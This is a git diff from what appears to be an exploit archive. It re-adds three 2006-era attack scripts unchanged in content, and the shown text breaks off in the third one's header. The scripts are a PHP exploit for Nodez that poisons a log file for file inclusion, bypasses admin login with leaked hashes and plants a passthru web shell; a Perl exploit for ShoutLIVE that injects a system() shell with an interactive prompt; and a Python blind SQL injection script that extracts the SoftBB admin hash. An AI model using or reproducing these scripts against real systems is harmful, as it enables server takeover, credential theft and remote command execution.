-echo "php ".$argv[0]." localhost /nodez/ 2 ls -la\r\n";
-echo "php ".$argv[0]." localhost /nodez/ 1 cat ./cache/users/list.gtdat\r\n";
-echo "php ".$argv[0]." localhost /nodez/ 1 cat ./cache/users/list.gtdat -p81\r\n";
-echo "php ".$argv[0]." localhost /nodez/ 1 cat ./cache/users/list.gtdat -P1.1.1.1:80\r\n";
-die;
-}
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$action=$argv[3];
-$cmd="";$port=80;$proxy="";
-
-for ($i=4; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "action selected -> ".$action."\r\n";
-if ($action=="1")
-{
-
-echo "[1] Injecting some code in log.gtdat file...\r\n";
-$CODE ='<?php;ob_clean();echo(666);'; //notice the trick to work with short_open_tag off
-$CODE.='passthru($_GET[cmd]);echo(666);die;?>';
-$packet="GET ".$p."index.php?node=system&op=extop&ext=statman&eop=/visitor&ip=".$CODE." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: close\r\n\r\n";
-#echo quick_dump($packet);
-sendpacketii($packet);
-sleep(1);
-$xpl=array ( '&op=blockop&block=3&bop=../../../../cache/ext/statman/log.gtdat%00',
-             '&op=../../../cache/ext/statman/log.gtdat%00',
-             '&op=extop&ext=statman&eop=../../../../cache/ext/statman/log.gtdat%00',
-             '&op=extop&ext=../../cache/ext/statman/log.gtdat%00'
-            );
-
-for ($i=0; $i<=count($xpl)-1;$i++)
-{
-$a=$i+2;
-echo "[".$a."] Trying with ".$xpl[$i]."\r\n";
-$packet="GET ".$p."index.php?cmd=".$cmd."&node=system".$xpl[$i]." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-#echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"666"))
-{
-echo "Exploit succeeded...\r\n";
-$temp=explode("666",$html);
-echo $temp[1];
-die;
-}
-}
-}
-else
-if ($action=="2")
-{
- echo "[1] Looking for list.gtdat file...\r\n";
- $packet="GET ".$p."cache/users/list.gtdat HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- #echo quick_dump($packet);
- sendpacketii($packet);
- if (strstr($html,"200 OK"))
- { echo "Done...we have list.gtdat file\r\n";
- }
- else
- {die("Exploit failed...");}
- $temp=explode(":\"",$html);
- $temp2=explode("\"",$temp[1]);
- $adm=$temp2[0];
- echo "admin -> ".$adm."\r\n";
- $temp2=explode("\"",$temp[3]);
- $hash=$temp2[0];
- echo "hash -> ".$hash."\r\n";
-
- echo "[2] Grab some data from login page...\r\n";
- $packet="GET ".$p."index.php HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- #echo quick_dump($packet);
- sendpacketii($packet);
- $temp=explode("+hex_md5('",$html);
- $temp2=explode("'",$temp[1]);
- echo "our string -> ".$temp2[0]."\r\n";
- $mypass=$hash.md5($temp2[0]);
- echo "our passport to heaven ->".$mypass."\r\n";
- $temp=explode("Set-Cookie: ",$html);
- $temp2=explode(" ",$temp[1]);
- $cookie=$temp2[0];
- echo "cookie -> ".$cookie."\r\n";
-
- echo "[3] Login...\r\n";
- $data ="uname=".urlencode($adm);
- $data.="&upass=".urlencode($mypass);
- $data.="&node=system";
- $data.="&ref=node%3Dsystem%26op%3Dlogout";
- $data.="&op=login";
- $packet ="POST ".$p."index.php? HTTP/1.0\r\n";
- $packet.="Host: $host\r\n";
- $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
- $packet.="Cookie: ".$cookie."\r\n";
- $packet.="Content-Length: ".strlen($data)."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- $packet.=$data;
- #echo quick_dump($packet);
- sendpacketii($packet);
- if (eregi("Welcome back",$html)) {echo "Logged in...\r\n";}
-                             else {die("Exploit failed...\r\n");}
- srand(make_seed());
- $anumber = rand(1,99999);
-
- echo "[4] Let's create a nodez id...\r\n";
- $packet ="GET ".$p."?node=system&op=advanced/superedit&step=edit&id=suntzu".$anumber." HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Cookie: ".$cookie."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- #echo quick_dump($packet);
- sendpacketii($packet);
-
- echo "[5] Let's create the php file...\r\n";
- $data ="title=suntzu".$anumber;
- $data.="&type=blog";
- $data.="&path=../suntzu".$anumber.".php";
- $data.="&hits=0";
- $data.="&date=now";
- $packet= "POST ".$p."?node=system&op=advanced/superedit&step=save&id=../suntzu".$anumber.".php HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
- $packet.="Content-Length: ".strlen($data)."\r\n";
- $packet.="Cookie: ".$cookie."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- $packet.=$data;
- #echo quick_dump($packet);
- sendpacketii($packet);
-
- echo "[6] Let's save the evil code ...\r\n";
- $data ="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $data.="Content-Disposition: form-data; name=\"node\"\r\n\r\n";
- $data.="system\r\n";
- $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $data.="Content-Disposition: form-data; name=\"op\"\r\n\r\n";
- $data.="editfile\r\n";
- $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $data.="Content-Disposition: form-data; name=\"step\"\r\n\r\n";
- $data.="finish\r\n";
- $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $data.="Content-Disposition: form-data; name=\"parent\"\r\n\r\n";
- $data.="../suntzu".$anumber.".php\r\n";
- $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $data.="Content-Disposition: form-data; name=\"nodez_title\"\r\n\r\n";
- $data.="suntzu".$anumber."\r\n";
- $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $data.="Content-Disposition: form-data; name=\"nodez_longtitle\"\r\n\r\n";
- $data.="suntzu".$anumber."\r\n";
- $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $data.="Content-Disposition: form-data; name=\"nodez_body\"\r\n\r\n";
- $data.="<?php if(get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}echo 666;\r\n";
- $data.="passthru(\$_GET[cmd]);echo 666;?>\r\n";
- $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $data.="Content-Disposition: form-data; name=\"author\"\r\n\r\n";
- $data.="suntzu\r\n";
- $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $data.="Content-Disposition: form-data; name=\"areg\"\r\n\r\n";
- $data.="0\r\n";
- $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $data.="Content-Disposition: form-data; name=\"mood\"\r\n\r\n";
- $data.="\r\n";
- $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $data.="Content-Disposition: form-data; name=\"music\"\r\n\r\n";
- $data.="\r\n";
- $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
- $packet ="POST ".$p."index.php? HTTP/1.1\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Connection: Close\r\n";
- $packet.="Cookie:".$cookie."\r\n";
- $packet.="Content-Length: ".strlen($data)."\r\n";
- $packet.="Content-Type: multipart/form-data; boundary=----------lNnHj26YsSTIS0qSMhw5MK\r\n\r\n";
- $packet.=$data;
- #echo quick_dump($packet);
- sendpacketii($packet);
-
- echo "[7] Launch commands...\r\n\r\n";
- $packet ="GET ".$p."suntzu".$anumber.".php?cmd=".$cmd." HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- #echo quick_dump($packet);
- sendpacketii($packet);
- if (strstr($html,"666"))
- {
-  echo "Exploit succeeded...\r\n\r\n";
-  $temp=explode("666",$html);
-  echo $temp[1];
-  die;
- }
-}
-else
-{die ("Wrong action...\r\n");}
-//if you are here...
-echo "Exploit failed...\r\n";
-?>
-
-# milw0rm.com [2006-03-18]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "Nodez 4.6.1.1 Mercury (possibly prior versions) multiple vulnerabilities\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+
+/*
+   software:
+   site: nodez.greentinted.com/
+   description: Nodez - "An open source  (content management system), designed to
+   be flexible, expandable, and as modular as possible." (ndr: maybe too modular ;) )
+
+   short explaination:
+   i) 'op','bop','ext','eop' arguments are not properly sanitized before to
+   include files from local resources. You can include arbitrary files
+   breaking the path through a null char (%00). Also you can inject
+   php code in cache/ext/statman/log.gtdat file and launch commands
+   including it, poc:
+
+   http://[target]/[path]/index.php?node=system&op=extop&ext=statman&eop=/visitor&ip=[code]
+
+   http://[target]/[path]/index.php?node=system&op=blockop&block=3&bop=../../../../cache/ext/statman/log.gtdat%00
+   http://[target]/[path]/index.php?node=system&op=../../../cache/ext/statman/log.gtdat%00
+   http://[target]/[path]/index.php?node=system&op=extop&ext=statman&eop=../../../../cache/ext/statman/log.gtdat%00
+   http://[target]/[path]/index.php?node=system&op=extop&ext=../../cache/ext/statman/log.gtdat%00
+
+   ii)
+   to list all files on target system:
+   http://[target]/[path_to_nodez]/countlines.php
+
+   iii)last but not least, the most chritical issue:
+
+   you can view all admin/users md5 password hashes, ex:
+
+   http://[target]/[path_to_nodez]/cache/users/list.gtdat
+
+   (if you do not believe it, give a look to the online demo:
+   http://demo.opensourcecms.com/nodez/cache/users/list.gtdat)
+
+   this because nodez do not provide an .htaccess file for users folder
+
+   you don't need to force it to login as admin, you can
+   craft a $_POST['upass'] value,ex:
+
+   [admin_md5_hash][md5("rndval[numbers]")]
+
+   this string should be calculated by a nodez javascript, but
+   you can easily do by yourself (the second fragment is inside
+   login page, something like "rndval[random_numbers]" )
+
+   once you have an admin session cookie, you can create and edit php files
+   (System options -> Toolbox -> Super Edit) and launch commands from them
+
+   this exploit makes the dirty work for i) and iii)
+                                                                              */
+if ($argc<3) {
+echo "Usage: php ".$argv[0]." host path action cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to nodez\r\n";
+echo "action:    1 - through arbitrary local inclusion\r\n";
+echo "               (works with magic_quotes_gpc= Off)\r\n";
+echo "           2 - through admin authentication bypass\r\n";
+echo "               (no php.ini restriction, you need the\r\n";
+echo "               list.gtdat file)\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /nodez/ 2 ls -la\r\n";
+echo "php ".$argv[0]." localhost /nodez/ 1 cat ./cache/users/list.gtdat\r\n";
+echo "php ".$argv[0]." localhost /nodez/ 1 cat ./cache/users/list.gtdat -p81\r\n";
+echo "php ".$argv[0]." localhost /nodez/ 1 cat ./cache/users/list.gtdat -P1.1.1.1:80\r\n";
+die;
+}
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$action=$argv[3];
+$cmd="";$port=80;$proxy="";
+
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "action selected -> ".$action."\r\n";
+if ($action=="1")
+{
+
+echo "[1] Injecting some code in log.gtdat file...\r\n";
+$CODE ='<?php;ob_clean();echo(666);'; //notice the trick to work with short_open_tag off
+$CODE.='passthru($_GET[cmd]);echo(666);die;?>';
+$packet="GET ".$p."index.php?node=system&op=extop&ext=statman&eop=/visitor&ip=".$CODE." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: close\r\n\r\n";
+#echo quick_dump($packet);
+sendpacketii($packet);
+sleep(1);
+$xpl=array ( '&op=blockop&block=3&bop=../../../../cache/ext/statman/log.gtdat%00',
+             '&op=../../../cache/ext/statman/log.gtdat%00',
+             '&op=extop&ext=statman&eop=../../../../cache/ext/statman/log.gtdat%00',
+             '&op=extop&ext=../../cache/ext/statman/log.gtdat%00'
+            );
+
+for ($i=0; $i<=count($xpl)-1;$i++)
+{
+$a=$i+2;
+echo "[".$a."] Trying with ".$xpl[$i]."\r\n";
+$packet="GET ".$p."index.php?cmd=".$cmd."&node=system".$xpl[$i]." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+#echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"666"))
+{
+echo "Exploit succeeded...\r\n";
+$temp=explode("666",$html);
+echo $temp[1];
+die;
+}
+}
+}
+else
+if ($action=="2")
+{
+ echo "[1] Looking for list.gtdat file...\r\n";
+ $packet="GET ".$p."cache/users/list.gtdat HTTP/1.0\r\n";
+ $packet.="Host: ".$host."\r\n";
+ $packet.="Connection: Close\r\n\r\n";
+ #echo quick_dump($packet);
+ sendpacketii($packet);
+ if (strstr($html,"200 OK"))
+ { echo "Done...we have list.gtdat file\r\n";
+ }
+ else
+ {die("Exploit failed...");}
+ $temp=explode(":\"",$html);
+ $temp2=explode("\"",$temp[1]);
+ $adm=$temp2[0];
+ echo "admin -> ".$adm."\r\n";
+ $temp2=explode("\"",$temp[3]);
+ $hash=$temp2[0];
+ echo "hash -> ".$hash."\r\n";
+
+ echo "[2] Grab some data from login page...\r\n";
+ $packet="GET ".$p."index.php HTTP/1.0\r\n";
+ $packet.="Host: ".$host."\r\n";
+ $packet.="Connection: Close\r\n\r\n";
+ #echo quick_dump($packet);
+ sendpacketii($packet);
+ $temp=explode("+hex_md5('",$html);
+ $temp2=explode("'",$temp[1]);
+ echo "our string -> ".$temp2[0]."\r\n";
+ $mypass=$hash.md5($temp2[0]);
+ echo "our passport to heaven ->".$mypass."\r\n";
+ $temp=explode("Set-Cookie: ",$html);
+ $temp2=explode(" ",$temp[1]);
+ $cookie=$temp2[0];
+ echo "cookie -> ".$cookie."\r\n";
+
+ echo "[3] Login...\r\n";
+ $data ="uname=".urlencode($adm);
+ $data.="&upass=".urlencode($mypass);
+ $data.="&node=system";
+ $data.="&ref=node%3Dsystem%26op%3Dlogout";
+ $data.="&op=login";
+ $packet ="POST ".$p."index.php? HTTP/1.0\r\n";
+ $packet.="Host: $host\r\n";
+ $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+ $packet.="Cookie: ".$cookie."\r\n";
+ $packet.="Content-Length: ".strlen($data)."\r\n";
+ $packet.="Connection: Close\r\n\r\n";
+ $packet.=$data;
+ #echo quick_dump($packet);
+ sendpacketii($packet);
+ if (eregi("Welcome back",$html)) {echo "Logged in...\r\n";}
+                             else {die("Exploit failed...\r\n");}
+ srand(make_seed());
+ $anumber = rand(1,99999);
+
+ echo "[4] Let's create a nodez id...\r\n";
+ $packet ="GET ".$p."?node=system&op=advanced/superedit&step=edit&id=suntzu".$anumber." HTTP/1.0\r\n";
+ $packet.="Host: ".$host."\r\n";
+ $packet.="Cookie: ".$cookie."\r\n";
+ $packet.="Connection: Close\r\n\r\n";
+ #echo quick_dump($packet);
+ sendpacketii($packet);
+
+ echo "[5] Let's create the php file...\r\n";
+ $data ="title=suntzu".$anumber;
+ $data.="&type=blog";
+ $data.="&path=../suntzu".$anumber.".php";
+ $data.="&hits=0";
+ $data.="&date=now";
+ $packet= "POST ".$p."?node=system&op=advanced/superedit&step=save&id=../suntzu".$anumber.".php HTTP/1.0\r\n";
+ $packet.="Host: ".$host."\r\n";
+ $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+ $packet.="Content-Length: ".strlen($data)."\r\n";
+ $packet.="Cookie: ".$cookie."\r\n";
+ $packet.="Connection: Close\r\n\r\n";
+ $packet.=$data;
+ #echo quick_dump($packet);
+ sendpacketii($packet);
+
+ echo "[6] Let's save the evil code ...\r\n";
+ $data ="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $data.="Content-Disposition: form-data; name=\"node\"\r\n\r\n";
+ $data.="system\r\n";
+ $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $data.="Content-Disposition: form-data; name=\"op\"\r\n\r\n";
+ $data.="editfile\r\n";
+ $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $data.="Content-Disposition: form-data; name=\"step\"\r\n\r\n";
+ $data.="finish\r\n";
+ $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $data.="Content-Disposition: form-data; name=\"parent\"\r\n\r\n";
+ $data.="../suntzu".$anumber.".php\r\n";
+ $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $data.="Content-Disposition: form-data; name=\"nodez_title\"\r\n\r\n";
+ $data.="suntzu".$anumber."\r\n";
+ $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $data.="Content-Disposition: form-data; name=\"nodez_longtitle\"\r\n\r\n";
+ $data.="suntzu".$anumber."\r\n";
+ $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $data.="Content-Disposition: form-data; name=\"nodez_body\"\r\n\r\n";
+ $data.="<?php if(get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}echo 666;\r\n";
+ $data.="passthru(\$_GET[cmd]);echo 666;?>\r\n";
+ $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $data.="Content-Disposition: form-data; name=\"author\"\r\n\r\n";
+ $data.="suntzu\r\n";
+ $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $data.="Content-Disposition: form-data; name=\"areg\"\r\n\r\n";
+ $data.="0\r\n";
+ $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $data.="Content-Disposition: form-data; name=\"mood\"\r\n\r\n";
+ $data.="\r\n";
+ $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $data.="Content-Disposition: form-data; name=\"music\"\r\n\r\n";
+ $data.="\r\n";
+ $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n";
+ $packet ="POST ".$p."index.php? HTTP/1.1\r\n";
+ $packet.="Host: ".$host."\r\n";
+ $packet.="Connection: Close\r\n";
+ $packet.="Cookie:".$cookie."\r\n";
+ $packet.="Content-Length: ".strlen($data)."\r\n";
+ $packet.="Content-Type: multipart/form-data; boundary=----------lNnHj26YsSTIS0qSMhw5MK\r\n\r\n";
+ $packet.=$data;
+ #echo quick_dump($packet);
+ sendpacketii($packet);
+
+ echo "[7] Launch commands...\r\n\r\n";
+ $packet ="GET ".$p."suntzu".$anumber.".php?cmd=".$cmd." HTTP/1.0\r\n";
+ $packet.="Host: ".$host."\r\n";
+ $packet.="Connection: Close\r\n\r\n";
+ #echo quick_dump($packet);
+ sendpacketii($packet);
+ if (strstr($html,"666"))
+ {
+  echo "Exploit succeeded...\r\n\r\n";
+  $temp=explode("666",$html);
+  echo $temp[1];
+  die;
+ }
+}
+else
+{die ("Wrong action...\r\n");}
+//if you are here...
+echo "Exploit failed...\r\n";
+?>
+
+# milw0rm.com [2006-03-18]
diff --git a/platforms/php/webapps/1590.pl b/platforms/php/webapps/1590.pl
index 1c175605d..7df70438a 100755
--- a/platforms/php/webapps/1590.pl
+++ b/platforms/php/webapps/1590.pl
@@ -1,59 +1,59 @@
-#!/usr/bin/perl
-##################################################
-# ShoutLIVE <= 1.1.0 Remote Php Code Execution
-# Based on: http://www.frsirt.com/bulletins/4109
-# Credits: Coded by DarkFig
-# Website: http://disarm.free.fr/bo_hard/
-# Greetz: All AcidRoot/Bod members =)
-##################################################
-use IO::Socket;
-use LWP::Simple;
-
-if(!$ARGV[1]){headers();
-print "\n| Usage: perl shoutlive110.pl <host> <path>   |
-+---------------------------------------------+
-| Coded by DarkFig |
-+------------------+
-";exit}
-
-sub headers() {
-print "\n
-+----------------------------------------------+
-| ShoutLIVE <= 1.1.0 Remote Php Code Execution |
-+----------------------------------------------+";}
-
-$host = $ARGV[0];
-$path = $ARGV[1];
-headers();
-$ncon = "\n [-]Can't connect to $host...";
-$ycon = "\n [+]Connected to $host...";
-$sdat = "\n [~]Sending malicious request...";
-$ycmd = "\n [+]System command writed...";
-$req1 = "send_email=0\" ?> <? \$cmd = \$_GET\['cmd']; system(\$cmd); ?> <? #";
-$lgr1 = length $req1;
-$psti = "$path"."savesettings.php";
-
-my $sock = new IO::Socket::INET(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or die "$ncon";
-print "$ycon"."$sdat";
-print $sock "POST $psti HTTP/1.1
-Host: $host
-Content-Type: application/x-www-form-urlencoded
-Content-Length: $lgr1
-
-$req1\n";
-close($sock);
-print "$ycmd";
-
-while(1 ne 2){
-print "\n [$host]\$ ";chomp($cmd = <STDIN>);
-if($cmd eq "exit"){eofi();}
-$req2 = "http://"."$host"."$path"."settings.php"."?cmd="."$cmd";
-$page = get($req2) or die "$ncon";
-print $page;}
-
-sub eofi() {
-print "+----------------------------------------------+
-|     Coded by DarkFig : [*BoD*]_AcidRoot      |
-+----------------------------------------------+\n";exit;}
-
-# milw0rm.com [2006-03-18]
+#!/usr/bin/perl
+##################################################
+# ShoutLIVE <= 1.1.0 Remote Php Code Execution
+# Based on: http://www.frsirt.com/bulletins/4109
+# Credits: Coded by DarkFig
+# Website: http://disarm.free.fr/bo_hard/
+# Greetz: All AcidRoot/Bod members =)
+##################################################
+use IO::Socket;
+use LWP::Simple;
+
+if(!$ARGV[1]){headers();
+print "\n| Usage: perl shoutlive110.pl <host> <path>   |
++---------------------------------------------+
+| Coded by DarkFig |
++------------------+
+";exit}
+
+sub headers() {
+print "\n
++----------------------------------------------+
+| ShoutLIVE <= 1.1.0 Remote Php Code Execution |
++----------------------------------------------+";}
+
+$host = $ARGV[0];
+$path = $ARGV[1];
+headers();
+$ncon = "\n [-]Can't connect to $host...";
+$ycon = "\n [+]Connected to $host...";
+$sdat = "\n [~]Sending malicious request...";
+$ycmd = "\n [+]System command writed...";
+$req1 = "send_email=0\" ?> <? \$cmd = \$_GET\['cmd']; system(\$cmd); ?> <? #";
+$lgr1 = length $req1;
+$psti = "$path"."savesettings.php";
+
+my $sock = new IO::Socket::INET(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or die "$ncon";
+print "$ycon"."$sdat";
+print $sock "POST $psti HTTP/1.1
+Host: $host
+Content-Type: application/x-www-form-urlencoded
+Content-Length: $lgr1
+
+$req1\n";
+close($sock);
+print "$ycmd";
+
+while(1 ne 2){
+print "\n [$host]\$ ";chomp($cmd = <STDIN>);
+if($cmd eq "exit"){eofi();}
+$req2 = "http://"."$host"."$path"."settings.php"."?cmd="."$cmd";
+$page = get($req2) or die "$ncon";
+print $page;}
+
+sub eofi() {
+print "+----------------------------------------------+
+|     Coded by DarkFig : [*BoD*]_AcidRoot      |
++----------------------------------------------+\n";exit;}
+
+# milw0rm.com [2006-03-18]
diff --git a/platforms/php/webapps/1594.py b/platforms/php/webapps/1594.py
index 8a417feae..7ed1692bd 100755
--- a/platforms/php/webapps/1594.py
+++ b/platforms/php/webapps/1594.py
@@ -1,51 +1,51 @@
-#!/usr/bin/env python
-# LOTFREE TEAM 03/2006
-# http://lotfree.next-touch.com/
-# http://membres.lycos.fr/lotfree/sploits/LOTF-SoftBB.py
-#
-# Vulnerability info
-# Product : SoftBB
-# Version : 0.1
-#
-# The field 'mail' in reg.php is used directly in a SQL query :
-# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = "'.add_gpc($pseudoreg).'" OR mail = "'.$mail.'"';
-# We can deduce deduce the result of some sql querys according to the error messages returned
-# The exploit test the characters of the md5 hash one by one using a special query
-import httplib, urllib
-
-# Change the following values...
-admin="admin"
-server="localhost"
-path="/forum"
-#
-hash=""
-chars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0')
-
-print "LOTFREE TEAM SoftBB BruteForcing tool"
-print "-------------------------------------"
-for i in range(1,33):
-  print "Brute forcing hash["+str(i)+"]"
-  for a in chars:
-    params=urllib.urlencode({'pseudo':admin,
-    'mdp':'1',
-    'mdpc':'1',
-    'mail':'" union select pseudo,1 from softbb_membres where pseudo="'+admin+'" and substr(mdp,'+str(i)+',1)="'+a+'" limit 1,1#',
-    'condok':'true'})
-    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
-    conn = httplib.HTTPConnection(server)
-    conn.request("POST", path+"/index.php?page=reg", params, headers)
-    response = conn.getresponse()
-    data = response.read()
-    conn.close()
-    if data.find("Ce pseudonyme est d")>0:
-      hash=hash+a
-      continue
-
-print
-if len(hash)==32:
-  print "Found hash =",hash,"for account",admin
-  print "You can use http://md5.rednoize.com/ to crack the md5 hash"
-else:
-  print "Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request..." 
-
-# milw0rm.com [2006-03-19]
+#!/usr/bin/env python
+# LOTFREE TEAM 03/2006
+# http://lotfree.next-touch.com/
+# http://membres.lycos.fr/lotfree/sploits/LOTF-SoftBB.py
+#
+# Vulnerability info
+# Product : SoftBB
+# Version : 0.1
+#
